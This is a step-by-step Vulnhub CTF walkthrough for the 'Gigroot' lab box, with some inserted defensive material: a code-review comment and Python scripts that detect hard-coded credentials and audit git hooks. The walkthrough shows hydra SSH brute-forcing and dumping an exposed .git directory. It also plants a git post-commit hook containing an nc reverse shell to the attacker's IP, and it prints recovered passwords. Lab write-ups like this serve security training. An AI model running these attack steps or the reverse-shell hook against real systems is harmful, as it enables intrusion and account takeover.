Vulnhub: detailed walkthrough of the Gigroot box


Gigroot

Identify the target host's IP address
```
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
_____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1    0a:00:27:00:00:05      1      60  Unknown vendor
192.168.56.100  08:00:27:ab:4c:5b      1      60  PCS Systemtechnik GmbH
192.168.56.103  08:00:27:44:c8:1b      1      60  PCS Systemtechnik GmbH
```
Using the netdiscover tool on Kali Linux, the target host's IP address is identified as 192.168.56.103.
Nmap scan
```
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.103 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-29 22:08 EDT
Nmap scan report for localhost (192.168.56.103)
Host is up (0.000075s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE   VERSION
22/tcp    open  ssh       OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 bf45f6b3e3ce0c69185a5b27e5d39c86 (RSA)
|   256 b5d7455006c4e23c2852b806261fdeb0 (ECDSA)
|_  256 27f0d02113309c5ef070a1d85ca78f75 (ED25519)
80/tcp    open  http      Apache httpd 2.4.38 ((Debian))
|_http-title: Hey Jen
|_http-server-header: Apache/2.4.38 (Debian)
11211/tcp open  memcache?
| fingerprint-strings:
|   RPCCheck:
|_    Unknown command
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port11211-TCP:V=7.93%I=7%D=4/29%Time=644DCDBD%P=x86_64-pc-linux-gnu%r(R
SF:PCCheck,27,"\x81\0\0\0\0\0\0\x81\0\0\0\x0f\0\0\0\x02\0\0\0\0\0\0\0\0Unk
SF:nown\x20command");
MAC Address: 08:00:27:44:C8:1B (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 85.92 seconds
```
The nmap scan shows that the target host has 3 open ports: 22 (ssh), 80 (http) and 11211 (unidentified; nmap only guesses memcache from the fingerprint).
Getting a shell
```
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ curl http://192.168.56.103/
<!doctype html>
<html>
        <head>
                <title>Hey Jen</title>
                </head>
        <body>
                <p> Hey Jen, just installed wordpress over at wp.gitroot.vuln <br> please go check it out! <p>
        </body>
</html>
```
Add wp.gitroot.vuln to the /etc/hosts file:
```
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ sudo vim /etc/hosts
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
192.168.56.103  wp.gitroot.vuln
```
Visiting http://wp.gitroot.vuln/ now returns a page showing that the target is a WordPress site. Next, run nikto against it:
```
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ nikto -h http://wp.gitroot.vuln/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.103
+ Target Hostname:    wp.gitroot.vuln
+ Target Port:        80
+ Start Time:         2023-04-29 22:24:21 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://wp.gitroot.vuln/index.php?rest_route=/>; rel="https://api.w.org/"
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ /: A Wordpress installation was found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login.php: Wordpress login found
+ 7863 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2023-04-29 22:25:11 (GMT-4) (50 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
```
```
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ gobuster dir -u http://wp.gitroot.vuln/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.js,.html,.txt,.sh,.bak
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://wp.gitroot.vuln/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              html,txt,sh,bak,php,js
[+] Timeout:                 10s
===============================================================
2023/04/29 22:25:59 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 280]
/.html                (Status: 403) [Size: 280]
/index.php            (Status: 301) [Size: 1] [--> http://wp.gitroot.vuln/]
/wp-content           (Status: 301) [Size: 323] [--> http://wp.gitroot.vuln/wp-content/]
/wp-login.php         (Status: 200) [Size: 3195]
/manual               (Status: 301) [Size: 319] [--> http://wp.gitroot.vuln/manual/]
/wp-includes          (Status: 301) [Size: 324] [--> http://wp.gitroot.vuln/wp-includes/]
/wp                   (Status: 403) [Size: 280]
/javascript           (Status: 301) [Size: 323] [--> http://wp.gitroot.vuln/javascript/]
/readme.html          (Status: 200) [Size: 7440]
/wp-trackback.php     (Status: 200) [Size: 136]
/wp-admin             (Status: 301) [Size: 321] [--> http://wp.gitroot.vuln/wp-admin/]
/xmlrpc.php           (Status: 405) [Size: 43]
/.php                 (Status: 403) [Size: 280]
/.html                (Status: 403) [Size: 280]
/wp-signup.php        (Status: 302) [Size: 1] [--> http://wp.gitroot.vuln/wp-login.php?action=register]
/server-status        (Status: 403) [Size: 280]
Progress: 1540385 / 1543927 (99.77%)===============================================================
2023/04/29 22:29:10 Finished
============================================================
```
Since we already know the target runs a WordPress site, the gobuster and nikto results show nothing beyond the usual WordPress directories and files. Next, see whether wpscan can enumerate usernames or an exploitable plugin.
```
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ wpscan --url http://wp.gitroot.vuln/ -e u,p
[+] beth
| Found By: Author Posts - Display Name (Passive Detection)
| Confirmed By:
|  Rss Generator (Passive Detection)
|  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
|  Login Error Messages (Aggressive Detection)
```
wpscan enumerates the username beth; try to crack its password.
```
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ wpscan --url http://wp.gitroot.vuln/ -U beth -P /usr/share/wordlists/rockyou.txt
```
beth's password could not be cracked, so check whether any plugins can be enumerated.
```
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ wpscan --url http://wp.gitroot.vuln/ --plugins-detection mixed
```
The akismet plugin is detected, but it has no exploitable vulnerability.
Could there be other subdomains?
After adding gitroot.vuln to /etc/hosts, brute-force subdomains with wfuzz:
```
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ wfuzz -c -u http://gitroot.vuln -H "Host:FUZZ.gitroot.vuln" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --hw 26
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************
Target: http://gitroot.vuln/
Total requests: 220560
=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================
000000001:   400        12 L     53 W       422 Ch      "# directory-list-2.3-medium.txt"
000000003:   400        12 L     53 W       422 Ch      "# Copyright 2007 James Fisher"
000000007:   400        12 L     53 W       422 Ch      "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"
000000012:   400        12 L     53 W       422 Ch      "# on at least 2 different hosts"
000000013:   400        12 L     53 W       422 Ch      "#"
000000011:   400        12 L     53 W       422 Ch      "# Priority ordered case-sensitive list, where entries were found"
000000010:   400        12 L     53 W       422 Ch      "#"
000000009:   400        12 L     53 W       422 Ch      "# Suite 300, San Francisco, California, 94105, USA."
000000002:   400        12 L     53 W       422 Ch      "#"
000000008:   400        12 L     53 W       422 Ch      "# or send a letter to Creative Commons, 171 Second Street,"
000000005:   400        12 L     53 W       422 Ch      "# This work is licensed under the Creative Commons"
000000006:   400        12 L     53 W       422 Ch      "# Attribution-Share Alike 3.0 License. To view a copy of this"
000000004:   400        12 L     53 W       422 Ch      "#"
000000793:   200        131 L    578 W      10697 Ch    "wp"
000002024:   400        12 L     53 W       422 Ch      "'"
000003790:   400        12 L     53 W       422 Ch      "%20"
000005302:   400        12 L     53 W       422 Ch      "$FILE"
000005954:   400        12 L     53 W       422 Ch      "$file"
000007004:   400        12 L     53 W       422 Ch      "*checkout*"
000012898:   200        21 L     51 W       438 Ch      "repo"
```
The repo subdomain is discovered; add it to /etc/hosts as well:
```
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
192.168.56.103  wp.gitroot.vuln
192.168.56.103  gitroot.vuln
192.168.56.103  repo.gitroot.vuln
```
Requesting the repo subdomain returns the following:
```
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ curl http://repo.gitroot.vuln/
<!doctype html
<html>
<head>
    <title>Code storage</title>
</head>

<body>
        <h1 >Welcome to our code storage area, we are currently storing a bunch of code here</h1>
        <p >Feel free to search our code base at get.php or set code in set.php </p>
</body>
</html>
```
gobuster does not find any more valuable files or directories under this subdomain:
```
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ gobuster dir -u http://repo.gitroot.vuln -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.bak,.txt,.js
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://repo.gitroot.vuln
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              php,html,sh,bak,txt,js
[+] Timeout:                 10s
===============================================================
2023/04/30 06:07:55 Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 282]
/index.php            (Status: 200) [Size: 438]
/.php                 (Status: 403) [Size: 282]
/stats.php            (Status: 200) [Size: 2911]
/manual               (Status: 301) [Size: 323] [--> http://repo.gitroot.vuln/manual/]
/get.php              (Status: 200) [Size: 144]
/javascript           (Status: 301) [Size: 327] [--> http://repo.gitroot.vuln/javascript/]
/set.php              (Status: 200) [Size: 151]
/.php                 (Status: 403) [Size: 282]
/.html                (Status: 403) [Size: 282]
/server-status        (Status: 403) [Size: 282]
Progress: 1542281 / 1543927 (99.89%)===============================================================
2023/04/30 06:11:15 Finished
===============================================================
```
The nikto results show that this subdomain exposes a /.git directory; use GitHack to clone the repository's files to the local Kali Linux machine.
```
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ nikto -h http://repo.gitroot.vuln
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.103
+ Target Hostname:    repo.gitroot.vuln
+ Target Port:        80
+ Start Time:         2023-04-30 06:11:29 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /.git/index: Git Index file may contain directory listing information.
+ /.git/HEAD: Git HEAD file found. Full repo details may be present.
+ /.git/config: Git config file found. Infos about repo details may be present.
+ 7863 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2023-04-30 06:12:20 (GMT-4) (51 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
      *********************************************************************
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to CIRT.net
      for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
```
```
┌──(kali㉿kali)-[~/Toolsets/GitHack]
└─$ python GitHack.py http://repo.gitroot.vuln/.git/
[+] Download and parse index file ...
[+] 33513a92c025212dd3ab564ca8682e2675f2f99bba5a7f521453d1deae7902aa.txt
[+] get.php
[+] index.php
[+] pablo_HELP.txt
[+] set.php
[+] stats.php
[OK] get.php
[OK] index.php
[OK] 33513a92c025212dd3ab564ca8682e2675f2f99bba5a7f521453d1deae7902aa.txt
[OK] pablo_HELP.txt
[OK] set.php
[OK] stats.php
```
First, see whether pablo's password can be cracked:
```
┌──(kali㉿kali)-[~/Toolsets/GitHack/repo.gitroot.vuln]
└─$ cat pablo_HELP.txt
I need help, something is wrong with this git repo
┌──(kali㉿kali)-[~/Toolsets/GitHack/repo.gitroot.vuln]
└─$ cat 33513a92c025212dd3ab564ca8682e2675f2f99bba5a7f521453d1deae7902aa.txt
pablo_S3cret_P@ss
beth_S3cret_P@ss
jen_S3cret_P@ss
```
The password is mastergitar:
```
┌──(kali㉿kali)-[~/Toolsets/GitHack/repo.gitroot.vuln]
└─$ hydra -l pablo -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.103
```
```
┌──(kali㉿kali)-[~/Toolsets/GitHack/repo.gitroot.vuln]
└─$ ssh pablo@192.168.56.103
The authenticity of host '192.168.56.103 (192.168.56.103)' can't be established.
ED25519 key fingerprint is SHA256:60rNw8fczihsSqs64B1Lf2E1VkCGOsuq8BTev2ELwLw.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.103' (ED25519) to the list of known hosts.
pablo@192.168.56.103's password:
Linux GitRoot 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue May 26 01:30:55 2020 from 192.168.56.1
pablo@GitRoot:~$ id
uid=1000(pablo) gid=1000(pablo) groups=1000(pablo)
pablo@GitRoot:~$ ls -alh
total 32K
drwxr-xr-x 4 pablo pablo 4.0K May 26  2020 .
drwxr-xr-x 5 root  root  4.0K May 26  2020 ..
lrwxrwxrwx 1 pablo pablo    9 May 26  2020 .bash_history -> /dev/null
-rw-r--r-- 1 pablo pablo  220 May 25  2020 .bash_logout
-rw-r--r-- 1 pablo pablo 3.5K May 25  2020 .bashrc
drwx------ 3 pablo pablo 4.0K May 25  2020 .gnupg
-rw-r--r-- 1 pablo pablo  807 May 25  2020 .profile
drwx-wx-wx 2 pablo pablo 4.0K May 25  2020 public
-rw-r--r-- 1 root  root   871 May 26  2020 user.txt
pablo@GitRoot:~$ cat user.txt
  _______ _                 _                          _____      _     _
 |__   __| |               | |                        |  __ \    | |   | |
    | |  | |__   __ _ _ __ | | __  _   _  ___  _   _  | |__) |_ _| |__ | | ___
    | |  | '_ \ / _` | '_ \| |/ / | | | |/ _ \| | | | |  ___/ _` | '_ \| |/ _ \
    | |  | | | | (_| | | | |   <  | |_| | (_) | |_| | | |  | (_| | |_) | | (_)
    |_|  |_| |_|\__,_|_| |_|_|\_\  \__, |\___/ \__,_| |_|   \__,_|_.__/|_|\___/
                                    __/ |
                                   |___/
Great job! Do not falter, there is more to do. You made it this far, finish the race!
"It's not that I'm so smart. Its just that I stay with problems longer." - Albert Einstein
8a81007ea736a2b8a72a624672c375f9ac707b5e
pablo@GitRoot:~$
```
We need to find the other git repository.
Upload the linpeas.sh script to the target host:
```
pablo@GitRoot:~/public$ ls -alh
total 12K
drwx-wx-wx 2 pablo pablo 4.0K May 25  2020 .
drwxr-xr-x 4 pablo pablo 4.0K May 26  2020 ..
-rw-r--r-- 1 beth  beth    58 May 25  2020 message.txt
pablo@GitRoot:~/public$ cat message.txt
Hey pablo
Make sure to check-out our brand new git repo!
```
A new git repository is found: drwxr-xr-x 8 beth beth 4096 May 26 2020 /opt/auth/.git
Enter that directory and take a look:
```
══════════╣ Analyzing Github Files (limit 70)
-rw-r--r-- 1 jen jen 50 May 26  2020 /home/jen/.gitconfig
drwxr-xr-x 8 beth beth 4096 May 26  2020 /opt/auth/.git
drwxr-xr-x 8 root root 4096 May 25  2020 /var/www/repo/.git
```
The directory holds many files, but sorting the listing with sort shows that dev-43 has a different size from the rest.
```
pablo@GitRoot:/opt/auth/.git/logs/refs/heads$ ls -alh | sort -n -r
total 804K
-rw-r--r-- 1 beth beth  595 May 26  2020 dev-43
-rw-r--r-- 1 beth beth  445 May 26  2020 dev-199
-rw-r--r-- 1 beth beth  443 May 26  2020 dev-99
-rw-r--r-- 1 beth beth  443 May 26  2020 dev-98
```
A password is found: r3vpdmspqdb. Since the new .git directory is owned by beth, this password most likely belongs to beth as well.
Switch to user beth:
```
pablo@GitRoot:/opt/auth/.git/logs/refs/heads$ cat dev-43
0000000000000000000000000000000000000000 fc9901f3b6b303d6ad40cdb71689f1646904f7b3 Your Name <you@example.com> 1590499965 -0400	branch: Created from HEAD
fc9901f3b6b303d6ad40cdb71689f1646904f7b3 b2ab5f540baab4c299306e16f077d7a6f6556ca3 Your Name <you@example.com> 1590500014 -0400	commit: init repo
b2ab5f540baab4c299306e16f077d7a6f6556ca3 06fbefc1da56b8d552cfa299924097ba1213dd93 Your Name <you@example.com> 1590500148 -0400	commit: added some stuff
06fbefc1da56b8d552cfa299924097ba1213dd93 aaa283c708d79c692797339434664f4ba7accb25 Your Name <you@example.com> 1590500197 -0400	commit: init repo
pablo@GitRoot:/opt/auth/.git/logs/refs/heads$ git show 06fbefc1da56b8d552cfa299924097ba1213dd93
commit 06fbefc1da56b8d552cfa299924097ba1213dd93
Author: Your Name <you@example.com>
Date:   Tue May 26 09:35:48 2020 -0400
    added some stuff
diff --git a/main.c b/main.c
index 70e6397..8af9b9c 100644
--- a/main.c
+++ b/main.c
@@ -4,6 +4,15 @@
int main(){
         char pass[20];
-       return 0;
+        scanf("%20s", pass);
+        printf("You put %s\n", pass);
+        if (strcmp(pass, "r3vpdmspqdb") == 0 ){
+                char *cmd[] = { "bash", (char *)0 };
+                execve("/bin/bash", cmd, (char *) 0);
+        }
+        else{
+                puts("BAD PASSWORD");
+        }
+        return 0;
}
-//43
+
```
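Review bot: in the added lines, `scanf("%20s", pass)` stores up to 20 characters plus the terminating NUL, 21 bytes, into `char pass[20]` from the context line above, so any 20-character input writes one byte past the end of the buffer; declare `char pass[21]` or read with `"%19s"`. The same hunk compares the input against the literal `"r3vpdmspqdb"`, which leaves the credential in plaintext in the binary and in every clone of the history (it is how the password was recovered on this box); compare against a salted hash loaded at runtime from a file that only the intended user can read.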
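As an added example (not part of the original post): the credential above reached pablo only because it was committed in plaintext, so the check below scans the added lines of a unified diff for string literals compared against or assigned to password-like names, the kind of pre-commit or CI gate that would have caught this commit. The sample diff is constructed here from the `git show` hunk above, and the regexes are my own heuristics rather than any project's ruleset.

```python
import re

# Constructed sample: the main.c hunk from the `git show` output above,
# written as a well-formed unified diff (context lines carry a leading space).
SAMPLE_DIFF = """diff --git a/main.c b/main.c
index 70e6397..8af9b9c 100644
--- a/main.c
+++ b/main.c
@@ -4,6 +4,15 @@
 int main(){
         char pass[20];
-       return 0;
+        scanf("%20s", pass);
+        printf("You put %s\\n", pass);
+        if (strcmp(pass, "r3vpdmspqdb") == 0 ){
+                char *cmd[] = { "bash", (char *)0 };
+                execve("/bin/bash", cmd, (char *) 0);
+        }
+        else{
+                puts("BAD PASSWORD");
+        }
+        return 0;
 }
"""

# Heuristics of our own (not any project's ruleset): a string literal that is
# compared against, or assigned to, a password-like identifier.
CREDENTIAL_PATTERNS = [
    re.compile(r'strcmp\s*\(\s*\w*(pass|pwd|secret|token|key)\w*\s*,\s*"([^"]+)"', re.I),
    re.compile(r'\b\w*(password|passwd|pass|secret|token|api_key)\w*\s*=\s*["\']([^"\']+)["\']', re.I),
]

HUNK_HEADER = re.compile(r'@@ -\d+(?:,\d+)? \+(\d+)')


def scan_diff(diff_text):
    """Return (path, new_line_number, literal) for each added line that
    matches a credential pattern. Only '+' lines are inspected, so removing a
    secret never triggers the check; line numbers refer to the new file."""
    findings = []
    path, new_ln = None, 0
    for line in diff_text.splitlines():
        if line.startswith('+++ '):
            path = line[4:]
            path = path[2:] if path.startswith('b/') else path
            continue
        if line.startswith('--- ') or line.startswith('\\'):
            continue                      # old-file header / "No newline" marker
        header = HUNK_HEADER.match(line)
        if header:
            new_ln = int(header.group(1))  # hunk start in the new file
            continue
        if line.startswith('-'):
            continue                      # removed line: not in the new file
        if line.startswith('+'):
            for pattern in CREDENTIAL_PATTERNS:
                hit = pattern.search(line[1:])
                if hit:
                    findings.append((path, new_ln, hit.group(2)))
                    break
        new_ln += 1                       # context and added lines both advance
    return findings


if __name__ == "__main__":
    for path, ln, literal in scan_diff(SAMPLE_DIFF):
        print(f"{path}:{ln}: hard-coded credential {literal!r}")
```

Running it reports main.c line 8, the `strcmp` line, which is the same location a reviewer of the hunk would flag.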
In beth's home directory, create a .git/hooks folder containing a post-commit file with a one-line nc reverse shell, give it 777 permissions, then pack the .git folder into a zip archive and give that 777 permissions as well:
```
pablo@GitRoot:~$ su - beth
Password:
beth@GitRoot:~$
beth@GitRoot:~$ ls -alh
total 28K
drwxr-xr-x 5 beth beth 4.0K May 26  2020 .
drwxr-xr-x 5 root root 4.0K May 26  2020 ..
lrwxrwxrwx 1 beth beth    9 May 26  2020 .bash_history -> /dev/null
-rw-r--r-- 1 beth beth    0 May 25  2020 .bash_logout
-rw-r--r-- 1 beth beth 3.5K May 26  2020 .bashrc
drwx------ 3 beth beth 4.0K May 26  2020 .gnupg
drwxr-xr-x 3 beth beth 4.0K May 25  2020 .local
-rw-r--r-- 1 beth beth  807 May 26  2020 .profile
drwx-wx-wx 2 beth beth 4.0K May 26  2020 public
```
Copy the archive to the /home/jen/public/repos directory:
```
beth@GitRoot:~$ mkdir -p .git/hooks
beth@GitRoot:~$ cd .git/hooks/
beth@GitRoot:~/.git/hooks$ vim post-commit
beth@GitRoot:~/.git/hooks$ cat post-commit
#!/bin/bash
nc -e /bin/bash 192.168.56.206 6666
beth@GitRoot:~/.git/hooks$ chmod 777 post-commit
beth@GitRoot:~/.git/hooks$ cd ~
beth@GitRoot:~$ 7z a xshell.zip  .git/
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,1 CPU Intel(R) Core(TM) i7-9700 CPU @ 3.00GHz (906ED),ASM,AES-NI)
Scanning the drive:
2 folders, 1 file, 48 bytes (1 KiB)
Creating archive: xshell.zip
Items to compress: 3
Files read from disk: 1
Archive size: 482 bytes (1 KiB)
Everything is Ok
beth@GitRoot:~$ chmod 777 xshell.zip
beth@GitRoot:~$
```
```
beth@GitRoot:~$ chmod 777 xshell.zip
beth@GitRoot:~$ cp xshell.zip /home/jen/public/repos
```
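As an added defensive check that is not part of the original post: the escalation above works because an executable post-commit hook inside an untrusted .git directory runs the moment the recipient makes a commit. The script below audits a repository's hook directory before the repository is used, following `core.hooksPath` (which can silently relocate the hooks), and reports every active non-template hook with its first command; the sample repository it builds is constructed here, and its hook body is a harmless marker rather than the page's payload.

```python
import os
import stat
import tempfile


def hooks_path_override(config_text):
    """Return core.hooksPath from .git/config text, or None. A planted
    hooksPath moves hooks out of .git/hooks, so an audit must follow it."""
    in_core = False
    for raw in config_text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("["):
            in_core = line.lower() == "[core]"
        elif in_core:
            key, _, value = line.partition("=")
            if key.strip().lower() == "hookspath":
                return value.strip()
    return None


def audit_git_hooks(repo_dir):
    """List (hook_name, first_command) for hooks git would actually run:
    regular files with the owner-execute bit set and no .sample suffix."""
    git_dir = os.path.join(repo_dir, ".git")
    hooks_dir = os.path.join(git_dir, "hooks")
    config_file = os.path.join(git_dir, "config")
    if os.path.isfile(config_file):
        with open(config_file) as fh:
            override = hooks_path_override(fh.read())
        if override:
            hooks_dir = override if os.path.isabs(override) else os.path.join(repo_dir, override)
    findings = []
    if not os.path.isdir(hooks_dir):
        return findings
    for name in sorted(os.listdir(hooks_dir)):
        if name.endswith(".sample"):
            continue                                  # git's inert templates
        path = os.path.join(hooks_dir, name)
        mode = os.stat(path).st_mode
        if not stat.S_ISREG(mode) or not mode & stat.S_IXUSR:
            continue                                  # git never runs these
        with open(path, errors="replace") as fh:
            lines = [l.strip() for l in fh if l.strip()]
        if lines and lines[0].startswith("#!"):
            lines = lines[1:]                         # drop the shebang
        findings.append((name, lines[0] if lines else ""))
    return findings


def build_sample_repo(hooks_path=None):
    """Constructed sample: a minimal .git layout carrying one active
    post-commit hook whose body is a harmless marker, not the page's payload."""
    repo = tempfile.mkdtemp(prefix="hookaudit-")
    git_dir = os.path.join(repo, ".git")
    hooks = os.path.join(repo, hooks_path) if hooks_path else os.path.join(git_dir, "hooks")
    os.makedirs(git_dir)
    os.makedirs(hooks, exist_ok=True)
    config = "[core]\n\trepositoryformatversion = 0\n\tfilemode = true\n"
    if hooks_path:
        config += f"\thooksPath = {hooks_path}\n"
    with open(os.path.join(git_dir, "config"), "w") as fh:
        fh.write(config)
    with open(os.path.join(hooks, "pre-commit.sample"), "w") as fh:
        fh.write("#!/bin/sh\nexit 0\n")
    hook = os.path.join(hooks, "post-commit")
    with open(hook, "w") as fh:
        fh.write("#!/bin/sh\necho 'post-commit ran' >> /tmp/hookaudit-demo.log\n")
    os.chmod(hook, 0o755)
    return repo


if __name__ == "__main__":
    for name, command in audit_git_hooks(build_sample_repo()):
        print(f"active hook {name}: {command}")
```

An empty result is the expected state for a freshly cloned repository; anything listed should be read before the first commit, and a non-default hooksPath in an archive you received is itself a finding.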
jen's password is binzpbeocnexoe
Privilege escalation
```
jen@GitRoot:~$ cat .viminfo
cat .viminfo
# This viminfo file was generated by Vim 8.1.
# You may edit it if you're careful!
# Viminfo version
|1,4
# Value of 'encoding' when this file was written
*encoding=utf-8
# hlsearch on (H) or off (h):
~h
# Command Line History (newest to oldest):
:wq
|2,0,1590471909,,"wq"
:q!
|2,0,1590471893,,"q!"
:Q!
|2,0,1590471892,,"Q!"
# Search String History (newest to oldest):
?/binzpbeocnexoe
|2,1,1590471908,47,"binzpbeocnexoe"
```